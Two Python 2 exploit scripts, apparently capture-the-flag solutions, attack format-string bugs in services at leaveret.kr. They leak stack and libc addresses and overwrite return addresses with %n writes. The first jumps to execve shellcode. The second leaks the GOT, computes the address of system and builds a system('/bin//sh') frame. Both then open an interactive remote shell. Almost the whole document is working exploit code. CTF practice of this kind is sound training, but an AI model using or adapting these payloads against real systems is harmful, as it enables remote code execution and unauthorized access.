BFSB1.
from socket import *
import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib
# common stuffs
# Little-endian packers used to splice raw addresses/values into payloads.
# Same call shape as the original one-liners: p(x) -> 4 bytes, pq(x) -> 8,
# ph(x) -> 2, pb(x) -> 1; struct.error on out-of-range input as before.
p = struct.Struct("<L").pack
pq = struct.Struct("<Q").pack
ph = struct.Struct("<H").pack
pb = struct.Struct("<B").pack
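def recv_until(s, pat):
    """Read from socket `s` until the data received so far contains `pat`.

    Args:
        s: a connected socket (anything with a ``recv(n)`` method).
        pat: delimiter to wait for (Python 2 str, like the rest of this file).

    Returns:
        Everything received, including whatever followed `pat` inside the
        chunk that completed it; callers that need the tail must keep it.

    Raises:
        EOFError: the peer closed the connection before `pat` showed up.
            ``recv`` returns '' forever on a closed socket, so the original
            loop spun at 100% CPU instead of failing.
    """
    msg = ''
    while True:
        chunk = s.recv(1024)
        if not chunk:
            raise EOFError('connection closed while waiting for {0!r}'.format(pat))
        msg += chunk
        if pat in msg:
            return msg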
def check(s):
    """Return True iff every character of `s` is a lowercase hex digit, space or newline.

    Used to decide whether a leaked ``%N$llx`` value is clean enough to be
    ``.decode('hex')``-ed; uppercase hex is rejected and '' passes.
    """
    allowed = set('0123456789abcdef \n')
    return all(ch in allowed for ch in s)
# pwn
# Plain IPv4 TCP connection to the challenge service. Python 2: socket reads
# are str, so they are concatenated directly with the text below.
s = socket(AF_INET, SOCK_STREAM)
s.connect( ('leaveret.kr', 10112) )
'''
# stage1
print 'go!'
recv_until(s, 'password or quit? ')
print 'stage1 start!'
for i in xrange(800, 980):
payload = '%{0}$llx'.format(i)
s.send(payload + '\n')
result = s.recv(1024).split('\n')[0]
print '{0} -> {1}'.format(payload, result)
if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
#payload = '%{0}$s'.format(i)
#s.send(payload + '\n')
#print '{0} -> {1}'.format(payload, s.recv(1024))
'''
# The stage-1 stack dump above (format-string read of positional arguments
# 800..979, printed as reversed hex) is disabled: the password it revealed is
# sent directly.
recv_until(s, 'password or quit? ')
s.send('LeaveRet_Handsome_Sexy_Pretty_Smart_ZZZZ\n')
# stage2
# x86-64 execve("/bin//sh", ["/bin//sh"], NULL): the bytes decode to
# xor rax,rax; xor rdx,rdx; push rax; mov rbx,"/bin//sh"; push rbx;
# mov rdi,rsp; push rax; push rdi; mov rsi,rsp; mov al,0x3b; syscall.
shellcode = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
nop = "\x90"
recv_until(s, 'break? ')
print 'stage2 start!'
# put shellcode
# 90-byte NOP sled ahead of the shellcode: the computed sh_addr below only has
# to land somewhere inside the sled, which tolerates error in SH_OFFSET.
s.send(nop*90 + shellcode + '\n')
recv_until(s, 'break? ')
# get stack address
# Leak a stack pointer by printing positional format argument 196 as hex.
s.send('%196$llx\n')
stack_addr = int(recv_until(s, 'break? ').split('\n')[0], 16)
print 'stack address -{0}-'.format(hex(stack_addr))
# stack offset
# Both distances are relative to the leaked pointer and specific to this
# binary: RET_OFFSET reaches the saved return address to patch, SH_OFFSET the
# buffer holding the sled + shellcode sent above.
RET_OFFSET = 416
SH_OFFSET = 1424
sh_addr = stack_addr - SH_OFFSET
print 'shellcode at -{0}-'.format(hex(sh_addr))
# overwrite 8 byte ret address byte-to-byte
# Only the low 6 bytes are written. %n (not %hhn) stores a 4-byte int, so the
# write at +N also zeroes +N+1..+N+3: the last step (N=5) clears bytes 6 and 7
# (expected to be zero already for a user-space x86-64 address) and spills one
# zero byte past the slot. Writing in increasing order lets each step repair
# the previous one's spill.
# NOTE(review): a zero address byte yields '%0c', which still prints one
# character, so that byte would be written as 1 — the script does not handle it.
for N in xrange(6):
    byte = str(int( ((sh_addr >> (N*8)) & 0xFF) ))
    print 'overwrite!' + byte
    # write ret address to stack
    # 56 bytes of filler presumably place the packed target pointer in the
    # stack slot that %17$n reads as its argument.
    s.send( 'A'*56 + pq(stack_addr - RET_OFFSET + N) + '\n' )
    recv_until(s, 'break? ').split('\n')[0]
    # write a value to return address
    # Print `byte` characters, then store printf's output counter through
    # argument 17 (the pointer planted above).
    s.send( '%'+byte+'c%17$n\n' )
    recv_until(s, 'break? ').split('\n')[0]
# inspect stack
print 'check STACK!'
'''
for i in xrange(1, 30):
payload = '%{0}$llx'.format(i)
s.send(payload + '\n')
result = recv_until(s, 'break? ').split('\npayload')[0]
print '{0} -> {1}'.format(payload, result)
#if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
'''
# return to shellcode
# 'break' presumably ends the server's input loop; the function then returns
# through the patched slot into the NOP sled.
s.send('break\n')
# get shell
# Hand the raw socket to telnetlib for an interactive session with the shell.
t = telnetlib.Telnet()
t.sock = s
t.interact()
BFSB2.
from socket import *
import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib
# common stuffs
# Little-endian packers used to splice raw addresses/values into payloads.
# Same call shape as the original one-liners: p(x) -> 4 bytes, pq(x) -> 8,
# ph(x) -> 2, pb(x) -> 1; struct.error on out-of-range input as before.
p = struct.Struct("<L").pack
pq = struct.Struct("<Q").pack
ph = struct.Struct("<H").pack
pb = struct.Struct("<B").pack
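def recv_until(s, pat):
    """Read from socket `s` until the data received so far contains `pat`.

    Args:
        s: a connected socket (anything with a ``recv(n)`` method).
        pat: delimiter to wait for (Python 2 str, like the rest of this file).

    Returns:
        Everything received, including whatever followed `pat` inside the
        chunk that completed it; callers that need the tail must keep it.

    Raises:
        EOFError: the peer closed the connection before `pat` showed up.
            ``recv`` returns '' forever on a closed socket, so the original
            loop spun at 100% CPU instead of failing.
    """
    msg = ''
    while True:
        chunk = s.recv(1024)
        if not chunk:
            raise EOFError('connection closed while waiting for {0!r}'.format(pat))
        msg += chunk
        if pat in msg:
            return msg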
def check(s):
    """Return True iff every character of `s` is a lowercase hex digit, space or newline.

    Used to decide whether a leaked ``%N$x`` value is clean enough to be
    ``.decode('hex')``-ed; uppercase hex is rejected and '' passes.
    """
    allowed = set('0123456789abcdef \n')
    return all(ch in allowed for ch in s)
# pwn
# Plain IPv4 TCP connection to the challenge service; `s` is the global
# socket every helper below sends through.
target = ('leaveret.kr', 10094)
s = socket(AF_INET, SOCK_STREAM)
s.connect(target)
# stage1
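def dump_memory(p_addr, length=None):
    """Leak target memory starting at `p_addr` through the ``%21$s`` read primitive.

    Each request is ``'%21$sBBB' + pq(addr)``: printf dereferences the packed
    address as a string, and the echo is cut at the 'BBB' marker. A ``%s`` leak
    stops at the first NUL, so an empty leak is recorded as one '\\x00' and the
    cursor advances by one; otherwise the cursor advances by the leaked length.
    Addresses whose packed form contains 0x0a are skipped without recording
    anything (the server presumably reads the request line only up to the
    newline), so the dump has gaps at those bytes. One line per read is
    printed with the address *after* advancing.

    Args:
        p_addr: address to start reading at.
        length: stop once at least this many bytes have been collected.
            ``None`` keeps the original behaviour of reading until killed,
            in which case the final print and the return are never reached.

    Returns:
        The leaked bytes as a str (Python 2), also printed as hex.
    """
    addr = p_addr
    elf = ''
    while length is None or len(elf) < length:
        if '\n' in pq(addr):
            # A newline inside the address would truncate the request.
            addr += 1
            continue
        payload = '%21$sBBB' + pq(addr)
        s.send(payload + '\n')
        result = recv_until(s, 'break? ').split('BBB')[0]
        if len(result) < 1:
            elf += '\x00'
            addr += 1
        else:
            elf += result
            addr += len(result)
        print('{0} : {1}'.format(hex(addr), result.encode('hex')))
    print(elf.encode('hex'))
    return elf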
#dump_memory( 0x8048000 ) # dump ELF image to find password.
# Stage 1: the password was presumably recovered offline from the ELF dump
# (the call above is left disabled), so it is sent straight away.
recv_until(s, 'password or quit? ')
s.send('Have_A_Fun_QUESTIONMARK_Love_FSB_NOT_GirlFrienddd\n')
print recv_until(s, 'break? ')
# stage2
def mem_read(addr):
    """Read a 32-bit little-endian value at `addr` via the ``%21$s`` leak.

    Returns 0 (and prints a notice) without sending anything when the packed
    address contains 0x0a, since the server stops reading the request there.

    Limitation of a ``%s`` read: it stops at the first NUL, so only the bytes
    before it are recovered. Missing high bytes are effectively treated as
    zero, a NUL in the middle of the value cannot be seen, and a value whose
    first byte is NUL makes ``int('', 16)`` raise ValueError.
    """
    packed = pq(addr)
    if '\n' in packed:
        print('address contains 0a!')
        return 0
    s.send('%21$sBBB' + packed + '\n')
    leaked = recv_until(s, 'break? ').split('BBB')[0]
    # Up to four leaked bytes, reversed out of little-endian, parsed as hex.
    value = int(leaked[:4][::-1].encode('hex'), 16)
    print('mem_read> {0} : {1}'.format(hex(addr), hex(value)))
    return value
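def pad8(count):
    """Build an 8-character ``%Nc`` + '#' prefix that prints exactly `count` bytes.

    mem_write needs the text in front of ``%23$n`` to be exactly 8 characters
    so the packed address still lands at positional argument 23, while the
    bytes printed before ``%n`` (N from ``%Nc`` plus the '#' filler) must add
    up to the byte being written. The original subtracted 5/4/3 based on the
    size of the *value* instead of the size of the *width*, which was off by
    one for 10..13 and 100..102, printed one byte for 5 (``%0c``) and gave a
    negative width for 0..4 (``%-5c``, nine bytes).

    Args:
        count: byte value 0..255 that printf's output counter must reach.

    Returns:
        An 8-char str such as '%46c####'. No 8-char spec prints fewer than 6
        bytes, so counts below 6 are wrapped to 256 + count; ``%n`` stores a
        full int, so the byte after the target then receives 0x01 instead of
        0x00 (mem_write overwrites it on the next step for all but the last
        byte of the value).

    Raises:
        ValueError: `count` cannot be encoded in 8 characters.
    """
    if count < 6:
        count += 256
    for filler in (5, 4, 3):
        width = count - filler
        spec = '%{0}c'.format(width)
        if width > 0 and len(spec) + filler == 8:
            return spec + '#' * filler
    raise ValueError('cannot encode byte count {0}'.format(count))


def mem_write(addr, data):
    """Write the 32-bit value `data` at `addr`, one byte per ``%23$n`` request.

    Returns 0 (and prints a notice) without writing when the packed address
    contains 0x0a, as the server reads the request only up to the newline.

    Each request is ``pad8(byte) + '%23$nBBB' + pq(addr + i)``: 16 bytes of
    format string followed by the target pointer, which is what argument 23
    resolves to on this target (the original payload layout implies this).
    ``%n`` rather than ``%hhn`` stores a 4-byte int, so each step also zeroes
    addr+i+1..addr+i+3; bytes are written in increasing order so every spill
    is repaired by the next step, and callers writing adjacent words must
    likewise go in increasing address order. The echo is drained after each
    write; the original also indexed it by '###', a check whose result was
    discarded and which could only raise.
    """
    if '\n' in pq(addr):
        print('address contains 0a!')
        return 0
    print('writing...')
    for i in range(4):
        byte = (data >> (8 * i)) & 0xFF
        s.send(pad8(byte) + '%23$nBBB' + pq(addr + i) + '\n')
        # Drain the echoed output up to the prompt before the next write.
        recv_until(s, 'break? ')
    print('mem_write> {0} : {1}'.format(hex(addr), hex(data)))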
def mem_leak():
    """Return the address of the return-address slot the script patches.

    Leaks positional argument 278 with ``%278$x`` (up to 8 hex digits before
    the 'BBB' marker) and subtracts the parent frame size (0x68, per the
    original comment) plus 4; the offset is specific to this binary.
    """
    parent_frame = 0x68
    s.send('%278$xBBB' + '\n')
    echoed = recv_until(s, 'break? ').split('BBB')[0]
    leaked = int(echoed[:8], 16)
    return leaked - parent_frame - 4
# leak got
# libc_start offset :18650
# system offset : 3b160
# 0x804b04c is read as a libc pointer (the comments above treat it as the GOT
# slot of __libc_start_main); 0x22B10 == 0x3b160 - 0x18650 is the distance
# from __libc_start_main to system in the target's libc build. Both values
# are specific to that binary/libc.
system = mem_read(0x804b04c) + 0x22B10 #libc_start + 0x22b10 -> system
p_retaddr = mem_leak()
print 'ret addr at {0}'.format(hex(p_retaddr))
print 'system at {0}'.format(hex(system))
# overwrite ret address!
mem_write(p_retaddr, system)
# build rop chain
# Fake 32-bit call frame for system(): [+0 ret -> system][+4 system's own
# return address, never set][+8 arg1 -> +16]["/bin//sh" at +16..+23][NUL at
# +24]. The writes go in increasing address order because each %n in
# mem_write also zeroes the three bytes after its target.
stack = p_retaddr
mem_write(stack+8, stack+16)
mem_write(stack+16, 0x6e69622f)  # "/bin" little-endian
mem_write(stack+20, 0x68732f2f)  # "//sh" little-endian
mem_write(stack+24, 0)           # terminating NUL
# inspect stack
'''
print 'check STACK!'
for i in xrange(270, 295):
payload = '%{0}$xBBB'.format(i)
s.send(payload + '\n')
result = recv_until(s, 'break? ').split('BBB')[0]
print '{0} -> {1}'.format(payload, result)
if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
'''
# 'break' presumably ends the server's input loop; the function then returns
# through the patched slot into system("/bin//sh").
s.send('break\n')
# get shell
# Hand the raw socket to telnetlib for an interactive session with the shell.
t = telnetlib.Telnet()
t.sock = s
t.interact()